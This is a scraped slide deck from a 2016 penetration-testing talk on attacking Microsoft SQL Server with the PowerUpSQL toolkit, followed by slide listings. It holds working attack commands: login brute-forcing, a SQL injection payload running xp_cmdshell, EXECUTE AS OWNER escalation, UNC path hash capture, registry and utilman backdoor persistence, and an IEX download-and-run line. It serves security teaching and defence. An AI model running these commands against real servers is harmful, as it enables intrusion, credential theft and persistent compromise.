The Travelling Pentester: Diaries of the Shortest Path to Compromise
byWill Schroeder
 
AntiVirus Evasion Reconstructed - Veil 3.0
byCTruncer
 

Similar to 2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)

PPT
Hackers Paradise SQL Injection Attacks
byamiable_indian
 
PPT
Dealing with SQL Security from ADO.NET
byFernando G. Guerrero
 
PDF
SQL Injection
byAbhinav Nair
 
PPT
MySQL crash course by moshe kaplan
byMoshe Kaplan
 
PPSX
Demo for Why Use PowerShell
bySirajJamdar
 
KEY
Flash And The City 2010
bySteven Peeters
 
PPTX
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
byThomasElling1
 
PDF
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
bySanjiv Kawa
 
PPT
Dealing with SQL Security from ADO.NET
byFernando G. Guerrero
 
PPTX
SQL Server R Services: What Every SQL Professional Should Know
byBob Ward
 
PPT
Introduction to Threading in .Net
bywebhostingguy
 
PPTX
Performance testing as part of Agile - Continius Delivery solution
bySergey Radov
 
PDF
Brief introduction into SQL injection attack scenarios
byPayampardaz
 
PPT
General Principles of Web Security
byjemond
 
PDF
common_schema, DBA's framework for MySQL
byShlomi Noach
 
PPT
SQL Server Security - Attack
bywebhostingguy
 
PDF
Windows Attacks AT is the new black
byRob Fuller
 
PDF
Windows attacks - AT is the new black
byChris Gates
 
PPTX
PowerShellForDBDevelopers
byBryan Cafferky
 
PPTX
Understanding and preventing sql injection attacks
byKevin Kline
 
Hackers Paradise SQL Injection Attacks
byamiable_indian
 
Dealing with SQL Security from ADO.NET
byFernando G. Guerrero
 
SQL Injection
byAbhinav Nair
 
MySQL crash course by moshe kaplan
byMoshe Kaplan
 
Demo for Why Use PowerShell
bySirajJamdar
 
Flash And The City 2010
bySteven Peeters
 
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
byThomasElling1
 
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
bySanjiv Kawa
 
Dealing with SQL Security from ADO.NET
byFernando G. Guerrero
 
SQL Server R Services: What Every SQL Professional Should Know
byBob Ward
 
Introduction to Threading in .Net
bywebhostingguy
 
Performance testing as part of Agile - Continius Delivery solution
bySergey Radov
 
Brief introduction into SQL injection attack scenarios
byPayampardaz
 
General Principles of Web Security
byjemond
 
common_schema, DBA's framework for MySQL
byShlomi Noach
 
SQL Server Security - Attack
bywebhostingguy
 
Windows Attacks AT is the new black
byRob Fuller
 
Windows attacks - AT is the new black
byChris Gates
 
PowerShellForDBDevelopers
byBryan Cafferky
 
Understanding and preventing sql injection attacks
byKevin Kline
 

More from Scott Sutherland

PPTX
Hunting SMB Shares with Data, Graphs, Charts, and LLMs (SO-CON 2025)
byScott Sutherland
 
PPTX
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
byScott Sutherland
 
PPTX
How to Build and Validate Ransomware Attack Detections (Secure360)
byScott Sutherland
 
PPTX
Secure360 - Attack All the Layers! Again!
byScott Sutherland
 
PPTX
WTF is Penetration Testing v.2
byScott Sutherland
 
PDF
Attack all the layers secure 360
byScott Sutherland
 
PDF
Declaration of malWARe
byScott Sutherland
 
PDF
Thick Application Penetration Testing: Crash Course
byScott Sutherland
 
PDF
Introduction to Windows Dictionary Attacks
byScott Sutherland
 
PDF
WTF is Penetration Testing
byScott Sutherland
 
Hunting SMB Shares with Data, Graphs, Charts, and LLMs (SO-CON 2025)
byScott Sutherland
 
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
byScott Sutherland
 
How to Build and Validate Ransomware Attack Detections (Secure360)
byScott Sutherland
 
Secure360 - Attack All the Layers! Again!
byScott Sutherland
 
WTF is Penetration Testing v.2
byScott Sutherland
 
Attack all the layers secure 360
byScott Sutherland
 
Declaration of malWARe
byScott Sutherland
 
Thick Application Penetration Testing: Crash Course
byScott Sutherland
 
Introduction to Windows Dictionary Attacks
byScott Sutherland
 
WTF is Penetration Testing
byScott Sutherland
 

Recently uploaded

PDF
The Role of Human Experiences (HX) in GenAI Adoption
byDr. Tathagat Varma
 
PDF
How to get started with Agentic Automation
byUiPathCommunity
 
PPTX
Behind the Scenes at Netflix: Distributed Systems & NoSQL Architecture.
byayesha butalia
 
PDF
Artificial Intelligence and YOU - Thinking Thoughtfully about AI
byMicah Melling
 
PDF
A SEA of Energy Efficiency Opportunities!
byMemoori
 
PDF
Session 2 - Agentic Orchestration with UiPath Maestro
byDianaGray10
 
PPTX
Cloud Metrics: The Cost-Value Equation (All Things Open 2025)
byEric D. Schabell
 
PDF
From Infrastructure to Insight: Technical Pathways to Value in Europe’s Compu...
byMindtrek
 
PPTX
Building Europe with Open LLMs - Manu Setälä.pptx
byMindtrek
 
PDF
Ethical Initiatives in AI and accountability.pdf
byShiwani Gupta
 
PPTX
⚡Level Up Your Slack Game: Workflows & Conditional Branching🎉
bySanjeetMishra29
 
PDF
UiPath DevConnect 2025: Introduction to Agentic Automation
byDianaGray10
 
PDF
A Guide to Microsoft Azure's Scalable and Secure Cloud Solutions
byTeleglobal International
 
PDF
Session 1 - Agentic Automation Building the Enterprise Agent of Tomorrow
byDianaGray10
 
PDF
Supercharge your JVM performance with Project Leyden and Spring Boot
byAmmbra
 
PDF
CIDT: Blockchain, DeFi & Product Engineering - MVPs in 4 Weeks with a Senior-...
byTetianaBuchynska1
 
PDF
Session 2 - Specialized AI Associate Series: Orchestrator Deep-Dive and UiPa...
byDianaGray10
 
PDF
Unleash the Power of Salesforce Winter ’26 Release.pdf
byyoyoloftis
 
PPTX
SIH Presentation praniawar2o25 cse.pptx
bysamikshamatkar91
 
PDF
A business case for open source: From lock-in to value.pdf
byMindtrek
 
The Role of Human Experiences (HX) in GenAI Adoption
byDr. Tathagat Varma
 
How to get started with Agentic Automation
byUiPathCommunity
 
Behind the Scenes at Netflix: Distributed Systems & NoSQL Architecture.
byayesha butalia
 
Artificial Intelligence and YOU - Thinking Thoughtfully about AI
byMicah Melling
 
A SEA of Energy Efficiency Opportunities!
byMemoori
 
Session 2 - Agentic Orchestration with UiPath Maestro
byDianaGray10
 
Cloud Metrics: The Cost-Value Equation (All Things Open 2025)
byEric D. Schabell
 
From Infrastructure to Insight: Technical Pathways to Value in Europe’s Compu...
byMindtrek
 
Building Europe with Open LLMs - Manu Setälä.pptx
byMindtrek
 
Ethical Initiatives in AI and accountability.pdf
byShiwani Gupta
 
⚡Level Up Your Slack Game: Workflows & Conditional Branching🎉
bySanjeetMishra29
 
UiPath DevConnect 2025: Introduction to Agentic Automation
byDianaGray10
 
A Guide to Microsoft Azure's Scalable and Secure Cloud Solutions
byTeleglobal International
 
Session 1 - Agentic Automation Building the Enterprise Agent of Tomorrow
byDianaGray10
 
Supercharge your JVM performance with Project Leyden and Spring Boot
byAmmbra
 
CIDT: Blockchain, DeFi & Product Engineering - MVPs in 4 Weeks with a Senior-...
byTetianaBuchynska1
 
Session 2 - Specialized AI Associate Series: Orchestrator Deep-Dive and UiPa...
byDianaGray10
 
Unleash the Power of Salesforce Winter ’26 Release.pdf
byyoyoloftis
 
SIH Presentation praniawar2o25 cse.pptx
bysamikshamatkar91
 
A business case for open source: From lock-in to value.pdf
byMindtrek
 

2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)

  • 1.
    Hacking SQL Serveron Scale with PowerShell v.2
  • 2.
    Speaker Information Name: ScottSutherland Job: Network & Application Pentester @ NetSPI Twitter: @_nullbind Slides: http://slideshare.net/nullbind http://slideshare.net/netspi Blogs: https://blog.netspi.com/author/scott-sutherland/ Code: https://github.com/netspi/PowerUpSQL https://github.com/nullbind
  • 3.
    Presentation Overview ● WhySQL Server and PowerShell? ● PowerUpSQL Overview ● Finding & Accessing SQL Servers ● Privilege Escalation Scenarios o Domain user to SQL Server login o SQL Server Login to Sysadmin o Sysadmin to Windows Admin o Windows Admin to Sysadmin o Domain Escalation ● Post Exploitation Activities ● General Recommendations
  • 4.
    Why SQL Server? ●Used in most enterprise environments ● Supports local Windows and Domain authentication ● Integrates with lots of Windows applications ● Generally has trust relationships that other don’t
  • 5.
    Why PowerShell? ● Nativeto Windows ● Run commands in memory ● Run managed .net code ● Run unmanaged code ● Avoid detection by legacy Anti-virus ● Already flagged as "trusted" by most application whitelist solutions ● A medium used to write many open source Pentest toolkits
  • 6.
  • 7.
    PowerUpSQL Overview: ProjectGoals Project Goals (Get-Abilities)  ● Scalability via runspace threading ● Flexibility via pipeline support ● ps objects and data tables ● Portability o No SMO dependancies o .Net Framework libraries o PowerShell v.2 compliant (in theory) o Single file Functional Goals ● Discover SQL Servers from different attacker perspectives ● Inventory SQL Servers quickly ● Audit SQL Servers for common insecure configurations ● Escalate privileges quickly on SQL Servers ● Support authentication using SQL Login or Windows Credential
  • 8.
    PowerUpSQL Overview: Functions PrimaryAttack Functions ● Invoke-SQLDumpInfo ● Invoke-SQLAudit ● Invoke-SQLEscalatePriv ● Invoke-SQLOsCmd https://github.com/NetSPI/PowerUpSQL/wikiCurrently about 60 Functions
  • 9.
    PowerUpSQL Overview: Wherecan I get it? Github https://github.com/netspi/PowerUpSQL PowerShell Gallery https://www.powershellgallery.com/packages/PowerUpSQL/
  • 10.
    PowerUpSQL Overview: Howdo I install it? Github Import-Module PowerUpSQL.psd1 IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/P owerUpSQL.ps1") Execution policy work arounds https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ PowerShell Gallery Install-Module -Name PowerUpSQL
  • 11.
  • 12.
    SQL Server Basics Whatis SQL Server? ● A database platform ● An application ● A set of Windows services ● Each instance has its own set of services
  • 13.
    SQL Server Basics:Account Types Account Types ● Windows Accounts o Used to login o Mapped to SQL Server login ● SQL Server Logins o Used to login o Mapped to database account ● Database Users o Used to access databases
  • 14.
    SQL Server Basics:Common Roles Important SQL Server Roles ● Sysadmin role ○ Database administrator account ○ Think of it as the “Administrators” Windows group, but in SQL Server ● Public role ○ Only provides CONNECT permission ○ Think of it as the “Everyone” Windows group, but in SQL Server
  • 15.
  • 16.
    Find SQL Servers:Techniques Attacker Perspective Attack Technique Unauthenticated ● List from file ● TCP port scan ● UDP port scan ● UDP broadcast ● Azure DNS dictionary attack (x.databases.windows.net) ● Azure DNS lookup via public resources Local User ● Services ● Registry entries Domain User ● Service Principal Names ● Azure Portal / PowerShell Modules
  • 17.
    Find SQL Servers:PowerUpSQL Attacker Perspective PowerUpSQL Function Unauthenticated Get-SQLInstanceFile Unauthenticated Get-SQLInstanceUDPScan Local User Get-SQLInstanceLocal Domain User Get-SQLInstanceDomain Blog: https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
  • 18.
  • 19.
    Testing Login Access:Techniques What credentials can I use to log into discovered SQL Servers? Attacker Perspective Attack Technique Unauthenticated Dictionary attacks using common user names and passwords. Unauthenticated Default passwords based on the SQL Server instance names. Local Windows or ADS Domain Account Attempt to login using the current account.
  • 20.
    Testing Login Access:PowerUpSQL CMDs What PowerUpSQL functions can I use to test for successful logins? Attack Technique PowerUpSQL Function Dictionary Attack Invoke-SQLAuditWeakLoginPw Default Password Test Invoke-SQLAuditDefaultLoginPw Get-SQLServerLoginDefaultPw Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose Local Windows or ADS Domain Account Get-SQLConnectionTestThreaded
  • 21.
    Testing Login Access:PowerUpSQL CMDs
  • 22.
    Testing Login Access:Login CMD Examples Attacker Perspective Command Example Unauthenticated Get-SQLInstanceUDPScan | Get-SQLConnectionTestThreaded -Verbose -Threads 15 -Username testuser -Password testpass Local User Get-SQLInstanceLocal | Get-SQLConnectionTestThreaded -Verbose Domain User Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15 Alternative Domain User runas /noprofile /netonly /user:domainuser PowerShell.exe Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15
  • 23.
    Testing Login Access:Reusing Result Lists Process Command Example Enumerate Accessible Servers $Accessible = Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15 | Where-Object {$_.Status –like “Accessible”} Get server information $Acessible | Get-SQLServerInfo -Verbose Get database list $Acessible | Get-SQLDatabase -Verbose Perform audit $Acessible | Invoke-SQLAudit -Verbose Do I have to rerun instance discovery every time I want to run a command? No.
  • 24.
    Testing Login Access:Domain User Access DEMO
  • 25.
  • 26.
    Escalating Privileges: DomainUser Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access
  • 27.
    Escalating Privileges: DomainUser Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access
  • 28.
    Escalating Privileges: DomainUser Why can Domain Users login into so many SQL Servers? ● Admins give them access ● Privilege inheritance issue on domain systems = Public role access
  • 29.
  • 30.
    Escalating Privileges: WeakPasswords Didn’t we just cover this? Yes, but there’s more… Technique PowerUpSQL Function Dictionary Attack Invoke-SQLAuditWeakLoginPw Default Password Test Invoke-SQLAuditDefaultLoginPw Local Windows or ADS Domain Account Get-SQLConnectionTestThreaded
  • 31.
    Escalating Privileges: WeakPasswords …we can also enumerate SQL Server logins and Domain Accounts  Technique PowerUpSQL Function Blind Login Enumeration + Dictionary Attack = Super Cool! Invoke-SQLAuditWeakLoginPw • Enumerate all SQL Server logins with the Public role • Enumerate all domain accounts with the Public role
  • 32.
    Escalating Privileges: WeakPasswords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail.
  • 33.
    Escalating Privileges: WeakPasswords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id”
  • 34.
    Escalating Privileges: WeakPasswords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID
  • 35.
    Escalating Privileges: WeakPasswords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID 4. Increment number and repeat
  • 36.
    Escalating Privileges: WeakPasswords Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID 4. Increment number and repeat select n [id], SUSER_NAME(n) [user_name] from ( select top 10000 row_number() over(order by t1.number) as N from master..spt_values t1 cross join master..spt_values t2 ) a where SUSER_NAME(n) is not null Code gifted from @mobileck Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
  • 37.
    Escalating Privileges: WeakPasswords select n [id], SUSER_NAME(n) [user_name] from ( select top 10000 row_number() over(order by t1.number) as N from master..spt_values t1 cross join master..spt_values t2 ) a where SUSER_NAME(n) is not null Code gifted from @mobileck Source: https://gist.github.com/ConstantineK/c6de5d3 98ec43bab1a29ef07e8c21ec7
  • 38.
    Escalating Privileges: WeakPasswords Enumerating Domain Users 1. Get the domain Domain of SQL Server
  • 39.
    Escalating Privileges: WeakPasswords Enumerating Domain Users 1. Get the domain 2. GID RID of default group Full RID of Domain Admins group
  • 40.
    Escalating Privileges: WeakPasswords Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
  • 41.
    Escalating Privileges: WeakPasswords Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
  • 42.
    Escalating Privileges: WeakPasswords Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 5. Use “suser_name” function to get domain object name 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
  • 43.
    Escalating Privileges: WeakPasswords Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 5. Use “suser_name” function to get domain object name 6. Increment and repeat 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
  • 44.
  • 46.
    Escalating Privileges: Impersonation 1.Impersonate Privilege a. Server: EXECUTE AS LOGIN b. Database: EXECUTE AS USER 2. Stored Procedure and Trigger Creation / Injection Issues a. EXECUTE AS OWNER b. Signed with cert login 3. Automatic Execution of Stored Procedures 4. Agent Jobs 5. xp_cmdshell proxy acount 6. Create Databse Link to File or Server 7. Import / Install Custom Assemblies 8. Ad-Hoc Queries 9. Shared Service Accounts 10. Database Links 11. UNC Path Injection
  • 47.
    Escalating Privileges: Impersonation ImpersonatePrivilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER Pros • Execute queries/commands in another user context Cons • Requires database to be configured as trustworthy for OS command execution • Commands and queries are not limited in any way
  • 48.
    Escalating Privileges: Impersonation ImpersonatePrivilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER
  • 49.
    Escalating Privileges: Impersonation ImpersonatePrivilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER
  • 50.
    Escalating Privileges: Impersonation StoredProcedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login Pros • Can execute queries/commands in another user context • Limit commands and queries • Don’t have to grant IMPERSONATE Cons • No granular control over the database owner’s privileges • DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin • Requires database to be configured as trustworthy for OS command execution • Impersonation can be done via SQL injection under specific conditions • Impersonation can be done via command injection under specific conditions
  • 51.
    Escalating Privileges: Impersonation StoredProcedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login • DB_OWNER role can impersonate the actual database owner USE MyAppDb GO CREATE PROCEDURE sp_escalate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MyAppUser','sysadmin' GO
  • 52.
    Escalating Privileges: Impersonation StoredProcedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login • DB_OWNER role can impersonate the actual database owner USE MyAppDb GO CREATE PROCEDURE sp_escalate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MyAppUser','sysadmin' GO SYSADMIN is often the OWNER
  • 53.
    Escalating Privileges: Impersonation StoredProcedure and Trigger Creation / Injection Issues • Use signed Procedures o Create stored procedure o Create a database master key o Create a certificate o Create a login from the certificate o Configure login privileges o Sign stored procedure with certifiate o GRANT EXECUTE to User Pros • Can execute queries/commands in another user context • Limit commands and queries • Don’t have to grant IMPERSONATE • Granular control over permissions • Database does NOT have to be configured as trustworthy for OS command execution Cons • Impersonation can be done via SQL injection under specific conditions • Impersonation can be done via command injection under specific conditions
  • 54.
    Escalating Privileges: Impersonation SQLInjection Example CREATE PROCEDURE sp_sqli2 @DbName varchar(max) AS BEGIN Declare @query as varchar(max) SET @query = ‘ SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''; EXECUTE(@query) END GO https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
  • 55.
    Escalating Privileges: Impersonation SQLInjection Example CREATE PROCEDURE sp_sqli2 @DbName varchar(max) AS BEGIN Declare @query as varchar(max) SET @query = ‘ SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''; EXECUTE(@query) END GO PURE EVIL https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
  • 56.
    Escalating Privileges: Impersonation SQLInjection Example EXEC MASTER.dbo.sp_sqli2 'master'';EXEC master..xp_cmdshell ''whoami''--'; https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
  • 57.
  • 58.
    Escalating Privileges: Impersonation AutomaticExecution of Stored Procedure • Stored procedures ca be configured to execute when the SQL Server service restarts Pros • Marking a stored procedure to run when the SQL Server service restarts has many use cases • Only stored procedures in the master database can be marked for auto execution Cons • No granular control over what context the startup command is executed in • All stored procedures marked for auto execution are executed as ‘sa’, even if ‘sa’ is disabled • Any non sysadmin access to stored procedures can lead to execution as ‘sa’
  • 59.
  • 60.
  • 61.
  • 62.
  • 63.
  • 64.
    Escalating Privileges: SysAdminto Service Account OS Command Execution = Service Account Impersonation Executing OS Commands: ● xp_cmdshell ● Custom Assemblies (.net) ● Custom Extended Stored Procedures (C++) ● Agent Jobs o ActiveX: Vbscript, Jscript, and Other o CmdExec o PowerShell o SSIS Package ● Registry Autoruns ● File Autoruns
  • 65.
    Escalating Privileges: SysAdminto Service Account OS Command Execution = Service Account Impersonation You don’t need to know the password, crack a hash, or PTH Service Account Types ● Local User ● Local System ● Network Service ● Local managed service account ● Domain managed service account ● Domain User ● Domain Admin
  • 66.
    Escalating Privileges: SysAdminto Service Account But wait, there’s more…RottenPotato @ DerbyCon 2016 - Authors: Chris Mallz (@vvalien1) & Steve Breen (@breenmachine) - We can now escalation from service account to LocalSystem! - No patch that I’m aware of. Check out their blog for details: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege- escalation-from-service-accounts-to-system/
  • 67.
    Escalating Privileges: Invoke-SQLOSCmd Invoke-SQLOSCMDcan be used for basic command execution. PS C:>$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10 ComputerName Instance CommandResults --------------------- ----------- -------------- SQLServer1 SQLServer1SQLEXPRESS nt servicemssql$sqlexpress SQLServer1 SQLServer1STANDARDDEV2014 nt authoritysystem SQLServer1 SQLServer1 DomainSQLSvc
  • 68.
  • 69.
    Escalating Privileges: SharedService Accounts Why should I care about shared service accounts? 1. SysAdmins can execute OS commands 2. OS commands run as the SQL Server service account 3. Service accounts have sysadmin privileges by default 4. Companies often use a single domain account to run hundreds of SQL Servers 5. So if you get sysadmin on one server you have it on all of them! One account to rule them all!
  • 70.
    InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and443 Ports 1433 and 1434 HVA PURE EVIL Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
  • 71.
    InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
  • 72.
    InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Execute Local Command via xp_cmdshell 2 Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
  • 73.
    InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Execute Local Command via xp_cmdshell 2 Access to HVA with shared domain service account Key HVA = High Value Application LVA = Low Value Application Execute commands and gather data from other database servers via osql 3 Leveraging Shared MS SQL Server Service Accounts
  • 74.
  • 75.
    Escalating Privileges: CrawlingServer Links What’s a database link? ● Database links are basically persistent database connections for SQL Servers. Why should I care? ● Short answer = privilege escalation ● Public role can use links to execute queries on remote servers (impersonation) SELECT * FROM OpenQuery([SQLSERVER2],’SELECT @@Version’) ● Stored procedures can be executed (xp_cmdshell) ● Links can be crawled
  • 76.
    InternetDMZIntranet LRA HVA LVA ADS Ports 80 and443 Ports 1433 and 1434 HVA PURE EVIL Captain EvilKey HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links DB1 LVA
  • 77.
    InternetDMZIntranet LRA HVA LVA ADS Ports 80 and443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links DB1 LVA
  • 78.
    InternetDMZIntranet LRA HVA LVA ADS Ports 80 and443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links D B Link w ith LeastPrivileges DB1 LVA
  • 79.
    InternetDMZIntranet LRA HVA LVA ADS Ports 80 and443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links D B Link w ith LeastPrivileges DB Link with SA account DB1 LVA Execute SQL queries and local commands on database servers via nested linked services 2
  • 80.
    Escalating Privileges: CrawlingServer Links Penetration Test Stats ● Database links exist (and can be crawled) in about 50% of environments we’ve seen ● The max number of hops we’ve seen is 12 ● The max number of servers crawled is 226
  • 81.
    Escalating Privileges: CrawlingServer Links Old Script ● 2012 - https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler New Script ● /scripts/pending/Get-SqlServerLinkCrawl.ps1 ● Author: Antti Rantasaari
  • 82.
  • 83.
  • 84.
  • 85.
  • 86.
    Escalating Privileges: UNCPath Injection UNC Path Injection Summary ● UNC paths are used for accessing remote file servers like so 192.168.1.4file ● Almost all procedures that accept a file path in SQL Server, support UNC paths ● UNC paths can be used to force the SQL Server service account to authenticate to an attacker ● An attacker can then capture the NetNTLM password hash and crack or relay it ● Relay becomes pretty easy when you know which SQL Servers are using shared accounts
  • 87.
  • 88.
    Escalating Privileges: UNCPath Injection Oh yeah… By DEFAULT, the PUBLIC role can execute (at least) two procedures that accept a file path xp_dirtree xp_fileexists
  • 89.
    Escalating Privileges: UNCPath Injection So, in summary… The PUBLIC role can access the SQL Server service account NetNTLM password hash by default!!
  • 90.
    Escalating Privileges: UNCPath Injection But who really has PUBLIC role access? Oh yeah, a ton of domain users 
  • 91.
  • 92.
    Escalating Privileges: UNCPath Injection DEMO
  • 93.
  • 94.
    Escalating Privileges: OSAdmin to SysAdmin Two things to know… 1. Different SQL Server versions can be abused in different ways 2. All SQL Server versions provide the service account with sysadmin privileges.
  • 95.
    Escalating Privileges: OSAdmin to SysAdmin Approach 2000 2005 2008 2012 2014 2016 LSA Secrets x x x x x x Local Administrator x x LocalSystem x x x Process Migration x x x x x x Token Stealing x x x x x X Single User Mode ? x x x x x Below are some options for leveraging that knowledge...
  • 96.
    Escalating Privileges: OSAdmin to SysAdmin Here are some tool options... Approach Common Tools Access as Local Administrator Management Studio, sqlcmd, and other native SQL client tools. Access as LocalSystem Psexec, accessibility options, debugger with native SQL client tools. Recover SQL Server service account password from LSA Secrets Mimikatz, Metasploit, lsadump. Inject shellcode or DLL into the SQL Server service process Metasploit, Empire, Python, Powershell, C, C++ (LoadLibrary,CreateRemoteThread, and similar functions) Steal Authentication Token From SQL Server service process Metasploit, Incognito, Invoke-TokenManipulation Single User Mode DBATools
  • 97.
  • 98.
    Post Exploitation: Overview CommonPost Exploitation Activities 1. Establish Persistence • SQL Server Layer: startup procedures, agent jobs, triggers, modified code • OS Layer: Registry & file auto runs, tasks, services, etc. 2. Identify Sensitive Data • Target large databases • Locate transparently encrypted databases • Search columns based on keywords and sample data • Use regular expressions and the Luhn formula against data samples 3. Exfiltrate Sensitive Data • All standard methods: Copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
  • 99.
    Post Exploitation: Persistence TaskCommand Example Registry Autorun Persistence Get-SQLPersistRegRun -Verbose -Name EvilSauce -Command "EvilBoxEvilSandwich.exe" -Instance "SQLServer1STANDARDDEV2014" Debugger Backdoor Persistence Get-SQLPersistRegDebugger -Verbose -FileName utilman.exe -Command 'c:windowssystem32cmd.exe' -Instance "SQLServer1STANDARDDEV2014"
  • 100.
  • 101.
    Post Exploitation: FindingSensitive Data Task Command Example Locate Encrypted Databases Get-SQLInstanceDomain -Verbose | Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults | Where-Object {$_.is_encrypted –eq “TRUE”} Locate and Sample Sensitive Columns and Export to CSV Get-SQLInstanceDomain -Verbose | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “credit,ssn,password” –SampleSize 2 –ValidateCC –NoDefaults | Export-CSV –NoTypeInformation c:tempdatasample.csv
  • 102.
    Post Exploitation: FindingSensitive Data DEMO
  • 103.
    Post Exploitation: FindingSensitive Data DEMO
  • 104.
  • 105.
    General Recommendations Things todo… 1. Enforce least privilege everywhere! 2. Disable dangerous default stored procedures. 3. Audit and fix insecure configurations. 4. Use policy based management for standardizing configurations. 5. Enable auditing at the server and database levels, and monitor for potentially malicious activity.
  • 106.
    PowerUpSQL Overview: Thanks! IndividualThird Party Code / Direct Contributors Boe Prox Runspace blogs Warren F. ( RamblingCookieMonster) Invoke-Parallel function Oyvind Kallstad Test-IsLuhnValid function Kevin Robertson Invoke-Inveigh Joe Bialek Invoke-TokenManipulation Antti Rantasaari, Eric Gruber, and Alexander Leary, @leoloobeek, and @ktaranov Contributions and QA Khai Tran Design advice NetSPI assessment team and dev team Design advice
  • 107.
